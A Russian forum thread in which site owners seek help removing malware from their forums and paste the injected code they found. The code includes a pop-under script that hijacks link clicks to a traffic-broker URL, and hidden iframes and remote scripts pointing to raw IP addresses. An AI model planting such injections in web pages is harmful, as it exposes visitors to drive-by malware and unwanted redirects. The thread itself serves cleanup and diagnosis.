[Вопрос]

Всем добрый вечер, вот задался вопросом как удалить вирус на сайте shadow-market.ru вообще не понимаю где его искать не могли бы подсказать?

parkourman, перезалейте файлы с чистого дистрибутива и поудаляйте все index.htm(l).

P.S Не забудьте сделать бэкап текущих файлов.

Quote:

Originally Posted by parkourman

вот задался вопросом

интересно...
вопрос - теоретический?

parkourman, о чём речь? скрипт, который цепляет trfmxk.info на страницу?
ищите в файлах
сегодня с утра у меня был вызов на форум - с почти таким же скриптом и именно этим доменом в скрипте, он был в index.php и в конфиге

проверить модули, нет ли чего лишнего
кстати, если обнаружите что-то на faq_complete - отпишитесь, интересно...
+ стандартные процедуры

а просто где нибудь найти в шаблоне никак нельзя?

Quote:

Originally Posted by parkourman

а просто где нибудь найти в шаблоне никак нельзя?

ищите... кто не даёт?

Luvilla вроде все проверил все шаблоны, модули все, ничего нет лишнего

Quote:

Originally Posted by parkourman

ничего нет лишнего

Quote:

Originally Posted by Luvilla

ищите в файлах

м?

проверил из шаблонов header home что ещё слудует проверить?

parkourman добавил 17.06.2011 в 23:54
а вот смотрите что я нашел:

Code:

if (navigator.cookieEnabled)
{
    var pop_under = null;
    var pop_cookie_name = "gavgav1";
    var pop_timeout = 720;

    function pop_cookie_enabled()
    {
        var is_enabled = false;
        if (!window.opera && !navigator.cookieEnabled)
         return is_enabled;

        if (typeof document.cookie == 'string')
          if (document.cookie.length == 0)
          {
              document.cookie = "test";
              is_enabled = document.cookie == 'test';
              document.cookie = '';
          }
          else
          {
              is_enabled = true;
          }
          return is_enabled;
   }

   function pop_getCookie(name)
   {
       var cookie = " " + document.cookie;
       var search = " " + name + "=";
       var setStr = null;
       var offset = 0;
       var end = 0;
       if (cookie.length > 0)
       {
           offset = cookie.indexOf(search);
           if (offset != -1)
           {
               offset += search.length;
               end = cookie.indexOf(";", offset);
               if (end == -1)
               {
                   end = cookie.length;
               }
            setStr = unescape(cookie.substring(offset, end));
        }
    }
    return(setStr);
   }

   function pop_setCookie (name, value)
   {
        document.cookie = name + "=" + escape(value) + ";expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
   }

   function show_pop()
   {
      var pop_wnd = "http://white-traff.in/in.cgi?parkourman2010";


       var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
       var need_open = true;
       if (document.onclick_copy != null)
         document.onclick_copy();
       if (document.body.onbeforeunload_copy != null)
         document.body.onbeforeunload_copy();
       if (pop_under != null)
       {
         if (!pop_under.closed)
           need_open = false;
       }

       if (need_open)
       {
           if (pop_cookie_enabled())
           {
               val = pop_getCookie(pop_cookie_name);
               if (val != null)
               {
                   now = new Date();
                   val2 = new Date(val);
                utc1 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
                utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
                if ((utc1 - utc2)/1000 < pop_timeout*60)
                {
                    need_open = false;
                }
            }
        }
    }

    if (need_open)
    {
        under = window.open(pop_wnd, "", fea_wnd);
        under.blur();   

        window.focus();
        if (pop_cookie_enabled())
        {
            now = new Date();
            pop_setCookie(pop_cookie_name, now);
        }
       }
   }

   function pop_init()
   {
         var ver = parseFloat(navigator.appVersion);
         var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);
      if (ver2)
      {
          if (document.links)
          {
              for (var i=0; i<document.links.length; i++)
              {
                  if (document.links[i].target != "_blank")
                  {
                      document.links[i].onclick_copy = document.links[i].onclick;
                      document.links[i].onclick = show_pop;
                 }
             }
         }
      }
      document.onclick_copy = document.onclick;
      document.onmouseup = show_pop;return true;
   }
   pop_init();
}

это же не относиться к вобле7

parkourman добавил 18.06.2011 в 00:18
а вот и сам код

Code:

</div><script language="JavaScript" src="http://46.4.98.91/followbb.php?i=19983"></script><iframe src="http://178.63.96.144/?rb" style="visibility: hidden;"></iframe><iframe src="http://178.63.96.168/?rb" style="visibility: hidden;"></iframe><iframe src="http://178.63.96.170/?rb" style="visibility: hidden;"></iframe><iframe src="http://46.4.98.91/?inid=19983&amp;intime=654171370" style="visibility: hidden;"></iframe>

Доброго времени суток.
Прошу помощи в удалении вируса с форума.
celestialbeing.ru - на него ругается гугл и яндекс. Проверил сайт через http://www.siteguard.ru/ и были обнаружены 2 Javascript:

Код:

Code:

<script type="text/javascript"> window.LESS_THAN_IE7 = true; </script>

и
Код:

Code:

<script type="text/javascript">//<![CDATA[ var a='',js=10;try{a+=';r='+escape(document.referrer);}catch(e){}try{a+=';j='+navigator.javaEnabled();js=11;}catch(e){} try{s=screen;a+=';s='+s.width+'*'+s.height;a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth);js=12;}catch(e){} try{if(typeof((new Array).push('t'))==="number")js=13;}catch(e){} try{document.write('<a href="http://top.mail.ru/jump?from=2193358">'+ '<img src="http://d7.c7.b1.a2.top.mail.ru/counter?id=2193358;t=175;js='+js+a+';rand='+Math.random()+ '" alt="Рейтинг@Mail.ru" style="border:0;" height="15" width="88" \/><\/a>');}catch(e){}//]]></script>

а так же 1 IFrame:

Код:

Code:

<iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'>

Является ли это вирусами?
Запутался каким образом их найти и как удалить эти скрипты?
В поиск через админку в шаблонах? все облазил, что требуется удалить не смог найти. Прошу помочь. Спасибо за внимание

eralcoil добавил 28.08.2012 в 12:07
IFrame удалось удалить. 2 первых Javascript не как не удалось найти =/